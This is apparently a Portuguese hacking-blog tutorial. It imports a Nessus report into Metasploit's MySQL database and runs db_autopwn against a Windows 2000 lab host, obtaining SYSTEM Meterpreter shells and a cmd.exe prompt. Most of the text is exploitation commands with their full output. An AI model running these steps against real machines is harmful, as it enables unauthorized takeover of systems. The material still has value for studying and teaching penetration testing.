:::..Brecha_hacKER..:::

Agora irei rebuscar os testes usando o MySQL para manter os alvos e suas vulnerabilidades em uma base de dados, explorando-as de forma automatizada com o db_autopwn.

O ambiente dos testes continuará o mesmo:

Host Debian com o Nessus, Metasploit e o MySQL Host Windows 2000

Pré-requisito para os testes:

Possuir os seguintes itens instalados:
libdbd-mysql-ruby1.8
Módulo activerecord ( gem install activerecord )

Preparando o ambiente

Inicie o driver para MySQL no MSF
msf> db_driver mysql**

Conectei o banco e criei uma base de dados chamada msf

msf> db_connect msf:******@localhost/msf**

Importei o report do Nessus para o banco

msf> nessus_report_get af55d200-77a4-fe0e-7baa-90a11eeab4839ecaf20114aac8b0

Listando as portas apartir da base de dados msf


msf> db_services

Services
========

created_at info name port proto state updated_at Host Workspace
---------- ---- ---- ---- ----- ----- ---------- ---- ---------
Fri Oct 01 12:06:03 UTC 2010 ftp 21 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 epmap 135 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
ri Oct 01 12:06:03 UTC 2010 135 udp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 netbios-ns 137 udp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 smb 139 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 cifs 445 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 dce-rpc 1025 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 dce-rpc 1028 udp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 www 5800 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 www 5801 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 vnc 5900 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 vnc 5901 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default


Listando as vulnerabilidades apartir da base de dados msf

msf > db_vulns

[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5901 proto=tcp name=NSS-19288 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5901 proto=tcp name=NSS-10342 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=21 proto=tcp name=NSS-22964 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5900 proto=tcp name=NSS-19288 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5900 proto=tcp name=NSS-10342 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5801 proto=tcp name=NSS-24260 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5800 proto=tcp name=NSS-10758 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5800 proto=tcp name=NSS-10107 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5800 proto=tcp name=NSS-43111 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=1028 proto=udp name=NSS-10736 refs=

....


O db-autopwn


O db_autopwn escaneará a base de dados e criará uma lista de módulos específicos para cada vulnerabilidade existente no alvo. A criação destes módulos ocorrerá de 2 formas:

1 - Os exploits serão carregados através da análise da lista de vulnerabilidades. Este tipo de cross-referência depende de alguns padrões como OSVDB, Bugtraq, e CVE para vincular o exploit ao alvo.

2 - Usa portas padrões associadas a cada exploit para localizar os alvos que estão rodando o mesmo serviço.

msf > db_autopwn

[*] Usage: db_autopwn [options]
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-r Use a reverse connect shell
-b Use a bind shell on a random port (default)
-q Disable exploit module output
-R [rank] Only run modules with a minimal rank
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range
-PI [range] Only exploit hosts with these ports open
-PX [range] Always exclude hosts with these ports open
-m [regex] Only run modules whose name matches the regex
-T [secs] Maximum runtime for any exploit in seconds


Hora da ação

msf > db_autopwn -p -t -e

[*] Analysis completed in 7 seconds (0 vulns / 0 refs)
[*]
[*] ================================================================================
[*] Matching Exploit Modules
[*] ================================================================================
[*] 192.168.0.6:5800 exploit/windows/vnc/winvnc_http_get (port match)
[*] 192.168.0.6:445 exploit/windows/smb/ms06_066_nwapi (port match)
[*] 192.168.0.6:21 exploit/windows/ftp/filecopa_list_overflow (port match)
[*] 192.168.0.6:21 exploit/windows/ftp/servu_mdtm (port match)
[*] 192.168.0.6:21 exploit/windows/ftp/easyfilesharing_pass (port match)
[*] 192.168.0.6:445 exploit/windows/smb/netidentity_xtierrpcpipe (port match)
[*] 192.168.0.6:445 exploit/windows/brightstor/ca_arcserve_342 (port match)
[*] 192.168.0.6:445 exploit/linux/samba/trans2open (port match)
....


================================================================================
[*] (1/81 [0 sessions]): Launching exploit/windows/vnc/winvnc_http_get against 192.168.0.6:5800...
[*] (2/81 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.0.6:445...
[*] (3/81 [0 sessions]): Launching exploit/windows/ftp/filecopa_list_overflow against 192.168.0.6:21...
[*] (4/81 [0 sessions]): Launching exploit/windows/ftp/servu_mdtm against 192.168.0.6:21...
[*] (5/81 [0 sessions]): Launching exploit/windows/ftp/easyfilesharing_pass against 192.168.0.6:21...
[*] (6/81 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.0.6:445...
[*] (7/81 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 192.168.0.6:445...
[*] (8/81 [0 sessions]): Launching exploit/linux/samba/trans2open against 192.168.0.6:445...
[*] (9/81 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.0.6:139...
....

[*] (81/81 [0 sessions]): Waiting on 35 launched modules to finish execution...
[*] Meterpreter session 1 opened (192.168.0.3:46168 -> 192.168.0.6:15979) at Fri Oct 01 10:37:39 -0300 2010
[*] Meterpreter session 2 opened (192.168.0.3:43223 -> 192.168.0.6:24353) at Fri Oct 01 10:37:40 -0300 2010
[*] (81/81 [2 sessions]): Waiting on 22 launched modules to finish execution...
[*] (81/81 [2 sessions]): Waiting on 12 launched modules to finish execution...
[*] (81/81 [2 sessions]): Waiting on 11 launched modules to finish execution...
[*] (81/81 [2 sessions]): Waiting on 11 launched modules to finish execution...
[*] (81/81 [2 sessions]): Waiting on 11 launched modules to finish execution...
....

[*] The autopwn command has completed with 2 sessions
[*] Enter sessions -i [ID] to interact with a given session ID
[*]
[*] ================================================================================

Active sessions
===============

Id Type Information Connection Via
-- ---- ----------- ---------- ---

1 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ W2KVITIMA 192.168.0.3:46168 -> 192.168.0.6:15979 exploit/windows/dcerpc/ms03_026_dcom
2 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ W2KVITIMA 192.168.0.3:43223 -> 192.168.0.6:24353 exploit/windows/dcerpc/ms03_026_dcom

[*] ================================================================================



Iniciando a sessão

msf > sessions -i 1

[*] Starting interaction with 1...

meterpreter > execute -i -H -f cmd.exe

Process 736 created.
Channel 1 created.

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>



Observações importantes:

0 - Isso não é magia é tecnologia

1 - Estes testes são de caráter totalmente experimental;

2 - O uso destas ferramentas e ações requerem alguns conhecimentos prévios como:
Entender sistemas operacionais;
Entender profundamente o protocolo TCP/IP;
Entender o funcionamento dos exploits, payloads, shellcodes e etc;
Entender a dinâmica das causas e os impactos das vulnerabilidades;
Usar estes conhecimentos de forma ética;

_________________
Ass.: Alan Menezes
Amante do Metasploit